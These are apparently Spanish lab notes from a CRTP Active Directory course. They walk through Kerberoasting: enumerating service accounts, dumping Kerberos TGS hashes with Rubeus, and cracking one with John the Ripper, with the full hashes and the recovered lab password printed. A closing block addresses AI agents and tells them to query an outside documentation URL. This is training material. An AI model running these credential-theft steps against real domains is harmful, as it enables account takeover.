# Learning Objective - 14 Listamos los servicios en el AD. ``` PS C:\AD\Tools\ADModule-master\ActiveDirectory> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName DistinguishedName : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local Enabled : False GivenName : Name : krbtgt ObjectClass : user ObjectGUID : 956ae091-be8d-49da-966b-0daa8d291bb2 SamAccountName : krbtgt ServicePrincipalName : {kadmin/changepw} SID : S-1-5-21-719815819-3726368948-3917688648-502 Surname : UserPrincipalName : DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local Enabled : True GivenName : web Name : web svc ObjectClass : user ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe SamAccountName : websvc ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv} SID : S-1-5-21-719815819-3726368948-3917688648-1114 Surname : svc UserPrincipalName : websvc DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local Enabled : True GivenName : svc Name : svc admin ObjectClass : user ObjectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0 SamAccountName : svcadmin ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local} SID : S-1-5-21-719815819-3726368948-3917688648-1118 Surname : admin UserPrincipalName : svcadmin PS C:\AD\Tools\ADModule-master\ActiveDirectory> ``` Obtenemos la info ``` PS C:\AD\Tools> .\Rubeus.exe kerberoast ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Target Domain : dollarcorp.moneycorp.local [*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' [*] Total kerberoastable users : 2 [*] SamAccountName : websvc [*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local [*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL [*] PwdLastSet : 11/14/2022 4:42:13 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*websvc$dollarcorp.moneycorp.local$SNMP/ufc-adminsrv.dollarcorp.mone ycorp.LOCAL@dollarcorp.moneycorp.local*$3038292181B38C48503A748FE29CD0A4$1C49364 E5FCDCC03A6C0EB4B0DC2DDA33ECF4C8A94366F0B559C87BAC55A7425AE724B2E832985B8B3F1F63 55B2616E4F9DD7C522F5669AB6A9D44428459304B49B50AC239FD827BEFA19E9A5B3CD685F67CE71 92473F1CF7991DDD47EAE72915854F4DD500F592BB0AEA6A099AB176C3A547FC51CD1461541CA7E6 1097A734973214ED9E0AE2FD88B77482F743D9B627E9D68DC6841FC335E9F36503E6EB01315AFFFF 1658261689CEBBE7BF6F7C0EE9F1AF5A63EB8FE904049F375788E7A1F5739D969238C9291C4A6735 7B700232FFA22AEAB006AD6DA817660CA178BFA46A1893EE1BD1F726B5AE2656BFB8C86F0D0CA8CA 05FA750016C16FF0E54E835649227940A3DA0519C5E0F12AAEEF2ACC055575AD9B9F1424F6F986AA 11A94C6D2E55D9182F27F0DE790BB3ADCC26EEE0A44AB7C5CBD3AB57BEA4FD0AB4EF89C6F9EC70BE 44861432253C3DB504E4E106CEAA600F24F5B15D0F4E16F3C79A76F1CA1093496EE9CDC3A75FD104 C5D79B9FEA6C3F1975D1C164CCE13C3F4E20DBA1871EA1F80290CE3C355077FC6D84EF50F6465A9B 6A0F101029C4EEB5A0BFF3755F24D3D859348DA49B90823BA4AB1A2C819276F86B8976A90F2615D9 B5B78BF382D73D4856FEC74313C9D351E7CD44AAC9FD69686B93E3DA49261159DBAE04B28A26B81D 09E083CBBCD627891D8EF103EBF9C137B43E31C53D4700503D4FA9A3AE7AEB9EA452E65001DFAAF0 F799C26ADD436E16657521369430731CEE9A5E58465C33C63302594C2A7F1AF4BDFED8D7D2D3777C BB55E2BD17F546962D3061ECBC509470589B188D1C1435AAE2C712B8999E6A8CC3843E1CCCACBB9E DD1A2CBD64441DE79D2365E5E9601615A91F80B10CBEA2A0863575A1D140A695715BFEDF1BA8C47A 996B342430581B34164DBC5AEB1191C0210C27FA80D0FDF03C21EC0F890833AB886505AD0A7568CC 514E221DCBF27F462EE78FF29EA76373920D97A4121F9566CAF96068878A1CD362FA285C9A0FF18E 7E36AA0368A67B7B78CF01BFCAC66262072576631E818681BFAD7C9358C5151C8E469C3573DDE5C3 510AE067A1865E289B53F993270AB1EC67C77672624454B3F462C8E881CFAF65DEA0F17944567781 2538C7C29F7589660EED111E4EE5CF934517449A653348F0014DDB56359900CF43D72A697A7D5741 C633CD8BED5306AC771A0664DAD9B49CF1AA510CCBD21D4565F363D9B7E103DD800BF904ED962C64 8F8165CC8ACC8D474D7C2C9972EF7E974AFED2981D25BAE4011DE4287709A9E9EE35501D3FA1B889 9BF6CCB3433EA1052183B049959BE858B035BAB971C23B5ECEFBD09E1AB78905A006D0F9AC341546 763620DF1B73B838797CBB1A406939B0868C65603DDDAC14CD9FAAC410509F351342C4540977899B DC847D302D870AC587143ED3E7B81D2E009304B2F2DCE86E7E13E6117878983F1361AAC169FA7EA9 89D5139BC577EEC2F62466EBCEB843F909449DD5D5859A0D084A74A6976B1CB5B6C629361FE3138B 0A3EAF5DFF4A1F45E81E6F70B38E4BDED57A023DAD884B13ED5EA80F0A51988F64FEF577E5E7F62E 3478A02ECE50631746546F5F1BA93ED23CA36347931F98DA9FC956216A8027B40EC6DF7B5C1E2A9E 9F7C15C2D8784D15BAE0017F9422CC5C9B291835B5916AA8FD82A6CC9E98D7C9414EDB9E5941294F B8581CFA27B1E627D32F6624D120DAA5AE2248975A9769E974DDBD59D9D976FEDD6113002218EA73 A1D1526C2CDFB089E39929F2CABF6562588F0587C1DB6D66E029D095AB127CC21B8D13609E1E6572 982CE37 [*] SamAccountName : svcadmin [*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local [*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433 [*] PwdLastSet : 11/14/2022 9:06:37 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-mgmt.dollarcorp. moneycorp.local:1433@dollarcorp.moneycorp.local*$8DED9453E15D1F4E6640695E0CE1863 5$BD9C24E624614B8590DD68ABE4AD46CCC3E5CFF83C85FA001DD2321B6389FBA38762FD25AEF271 B2651B3047514372AA07FB9D59785FC2750B4D34F402DEE9E077DF1B912A3833BBDA24EB7F4344C2 FEE9FD4B12651D1B8E2C07F6C3DC0384BDF10592771C6AC70765F8763393AC464291262912535A62 7F52BE7B31AF74F6849A9C14BEFE2685F14A2CFA99365BCD16A5816CB1E267F89B5184A87D9B7715 D774BAA8F5F6E4A3BE1FD85E842ABD409D89B8B3A72206F6B37C1261F713C5BD60577B2AF50C0AA6 68C3568127D7D0F667F8B19833EF3EE8E6E88416727E1F26AD677F7AC013955E5367DBF39F6A04BA 5EC79015FC411986355ABF7B50B100584A3A45835C772366BDE609092EF1BC7DBE1EC73762D7618A 8348E02B241EDA1358E145B489A5619845793E7ADE0401C7B790B0F0D7CF25096802B7451DE24A71 F247777CF91A39CC7A99D935FDA62F506961DDE3653DE602A002DC15EECC191A3B90078F9D23D25E E36BA0A29099C4BFB2E0C2A5CFA18DB89BCBD7B8C496A1328F270DCF20ECCFC88164DEA8E5862359 248D25ADC788181CD68C32FF479C29CE4E1D4806B20EF41FC3E21D11B64EBBDB6A73A0CDE65D7F99 0485696571DB6C599C9E1A29B12E7F256134CECA049FD2C727DBDA6621470E670EAECEB7F0C605AD 94D6814D5C3F94DAAFD856F70BBC06899ACC6AA10FF96088066BD70B9E93B378770E500C748D8C4B F80885ED12415B1CCE3BA7555EA762608A9EC4658B2FD2B73B905F71415AF6E5FC03FAB3C1DB7CD0 DB3D92CBD9E67EE98D07DD38D2E1BEB228FF78AF7BCD01482E30E171702E3F1DFFA59375C65E412F 94A1258A36C1A88FCB81E4D1C551CB35C3AE0B3BF6CEB46FF5C118FD6DA4C14321A67733850ED463 CA4E790884D04154A1090F21E025ABA309C0587FFAB203631338B23BE417346DBE92BAA4BFAA63F6 3FAD9AFA8DB2585ED1A6C855A5ED5B6B2D98619914132BCCC679A454DBC70C96232CC1B618A98120 9C7CDB0FEEE9EE7CE0D8F630F593C939BCF985DDEB29556CC5BCD990E980CAA73C3366F18BDE6235 FB7AF49DC013A886A873710B56C37FF1117D967019E6C93B9179CBDC005280B22E7465EDFE0C15BC 291CDAFDE7E4BC2A1176B6AB60FD00068486DBFF28AFA29EFAA436D1C595EF154FAA725227CF24BC B93E07D7E652061E6B77415F7919BD34ECE67D82302F6168CD3995214C52B5BA853D832568233DBF C22779149E29345D9D4D87BBB459870E7CA431D8F7DE34D245AF7B061BD5C361EBA0595FDE1647B1 BE388E982D9B5F99F32D19009AF6EAEE73600E1AF0A8954D3BE6C6FF9930AB0C6AD25251A273F8F1 47A9E343B7CD82D57A79C3418E8111481BC337627D849655D2BD71C6E30ABDD15D4CA10CA4159B44 B979D4123467F84AAB28350A5E2978F299D58FF1B9A875E8DAF1E789B03DA396A459DE7B7BEB5E91 8FB1F00C8AC9BA163B712381E61A3C21E7B2BBD160284A1A4B43F1A31C557B221FE65B54CBE38E13 663CAF238089A110E4AE14B66E25D425BD23653F10F0FE0E6595DB079E16EA65AB728CE493B11B8B C59EEC0B898908BE1A3F52AE91A90FA62A8FFB401381E61476CB61EC9CA88CB872C5C02350612568 6056E7940A1D79F7F4783200728322B5C3922C30140647781BCAF41C5F00EE083B400CC201F5B0D3 94776977098C93F9BE8CA6D40AE111729479A2EDA565E075528843D8A7C7C75F9D8718CF02B0D73A 40338C0C6C1E39AED7B9D59461F5FAD44568711025AF60988AF7E8F684B454ED9681A3E0D810C44E 531499D3E5A97A28 ``` o tambien {% code overflow="wrap" %} ``` PS C:\AD\Tools> .\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:hash.txt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Kerberoasting [*] Using 'tgtdeleg' to request a TGT for the current user [*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else [*] Target User : svcadmin [*] Target Domain : dollarcorp.moneycorp.local [+] Ticket successfully imported! [*] Searching for accounts that only support RC4_HMAC, no AES [*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))' [*] Total kerberoastable users : 1 [*] Hash written to C:\AD\Tools\hash.txt [*] Roasted hashes written to : C:\AD\Tools\hash.txt ``` {% endcode %} NO OLVIDEMOS ENTRAR AL ARCHIVO hash.txt y eliminar el puerto del servicio SQL antes de crackear. ``` C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status *ThisisBlasphemyThisisMadness!! (?) 1g 0:00:00:00 DONE (2024-03-01 05:02) 13.15g/s 26947p/s 26947c/s 26947C/s energy..mollie Use the "--show" option to display all of the cracked passwords reliably Session completed ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-14.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.